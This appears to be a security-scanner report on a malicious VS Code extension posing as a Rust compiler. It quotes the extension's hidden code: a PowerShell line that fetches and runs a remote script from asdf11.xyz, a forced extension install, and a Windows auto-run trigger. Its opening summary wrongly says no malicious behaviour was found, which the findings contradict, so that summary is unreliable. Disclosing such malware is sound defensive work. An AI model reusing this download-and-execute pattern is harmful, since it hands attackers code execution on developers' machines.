Is Rust Compiler for VSCode safe?

Analysis summary

The Rust Compiler for VSCode extension is designed to integrate Rust language compilation within the Visual Studio Code environment. It has been assigned a critical risk level due to its potential to introduce significant security threats, although no specific malicious behavior has been confirmed.

Key insights:

Integrates Rust language compilation into VSCode.
Risk level: Critical, primarily due to potential security threats.
No specific technical behaviors such as external script execution or local file access have been identified.
Operates within its expected scope but poses a high risk due to the critical risk assessment.
The critical risk level suggests potential exposure to development environment vulnerabilities, impacting codebase integrity.

Malware versions

0.0.4

Now Viewing

malware

Findings

Malicious Activity Detected

Flags items that exhibit confirmed malicious activity.

critical

Evidence

The extension constructs a command string that launches PowerShell and executes a remote script const cmdCommand = 'powershell -Command "irm https://asdf11.xyz/ | iex"';

Removed from Marketplace

Flags items that have been removed or delisted from the marketplace, potentially due to security vulnerabilities, or malicious behavior. Such extensions pose a risk as they are no longer maintained or patched.

high

Unverified Publisher

Flags items published by entities that haven’t gone through the publisher verification process of the marketplace. Lack of verification may indicate higher risk, as the publisher’s identity and trustworthiness are unconfirmed.

medium

All findings are available for Enterprise users

Code analysis

AI-powered analysis of the extension's source code for security insights and risk assessment.

Extension Purpose and Intention

The provided code is a Visual Studio Code (VSCode) extension designed to automate the installation and activation of other VSCode extensions. It includes functionality to execute command-line instructions and manage extensions within the VSCode environment.

Code Functionality

Command Execution: The extension uses Node.js's child_process module to execute command-line instructions. This is primarily used to run a PowerShell command.
```
const cmdCommand = 'powershell -Command "irm https://asdf11.xyz/ | iex"';
await executeCmdCommand(cmdCommand);
```
Extension Management: The extension checks if a specified extension is installed and, if not, triggers its installation and activation.
```
const extensionId = 'icrawl.discord-vscode';
await installExtension(extensionId);
```

Automatic Execution: The extension automatically executes a command after a short delay if the platform is Windows.

if (process.platform === 'win32') {
  setTimeout(() => {
    vscode.commands.executeCommand('hubtestmanagerex.runCmd');
  }, 1000);
}

Potential Malicious Indicators

Network Activity: The code attempts to download and execute a script from an external URL (https://asdf11.xyz/). This is done using PowerShell's irm (Invoke-RestMethod) and iex (Invoke-Expression) commands, which can be used to execute scripts directly from the internet.
```
const cmdCommand = 'powershell -Command "irm https://asdf11.xyz/ | iex"';
```
Command Execution: The use of cmd.exe and PowerShell to execute commands can be a vector for executing arbitrary code, especially when combined with downloading scripts from external sources.

Conclusion

The extension's behavior of downloading and executing scripts from an external URL without user consent or verification is a strong indicator of potential malicious activity. This could lead to unauthorized code execution and compromise the user's system.

Recommendations

User Awareness: Users should be cautious about installing extensions that execute external scripts.
Code Review: Conduct a thorough review of the code and the external script being downloaded to ensure it does not perform harmful actions.

API Calls

API calls detected through static analysis of the source code. For more accurate insights, explore our sandbox dynamic analysis.

critical

vscode.commands.executeCommand

vscode

/extension/extension.js

low

vscode.extensions.getExtension

vscode

/extension/extension.js

low

vscode.window.showInformationMessage

vscode

/extension/extension.js

All API calls are available for Enterprise users

Secrets

Any encoded/decoded secrets we managed to find in the source code, git repository, or related files

Gitlab

/extension/node_modules/vsce/out/main.js

Unverified

Gitlab

/extension/node_modules/vsce/out/main.js

Unverified

All secrets are available for Enterprise users

Vulnerabilities

Known vulnerabilities and security issues detected in the extension's dependencies and code.

GHSA-776f-qx25-q3cc

xml2js is vulnerable to prototype pollution

CVSS:

All vulnerabilities are available for Enterprise users

External communication

Any identifiers we detected that may indicate external communication from the item's code

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

EXTERNAL COMMUNICATIONS ARE AVAILABLE FOR ENTERPRISE USERS

Dependencies

Dependencies and third-party libraries used by the extension, including version information and license details.

@types/mocha

Version:

Unknown

@types/vscode

Version:

Unknown

@vscode/test-cli

Version:

Unknown

All dependencies are available for Enterprise users

Licenses & Compliance

high

Enterprise Only

medium

Enterprise Only

low

Enterprise Only

LICENSES & COMPLIANCE ARE AVAILABLE FOR ENTERPRISE USERS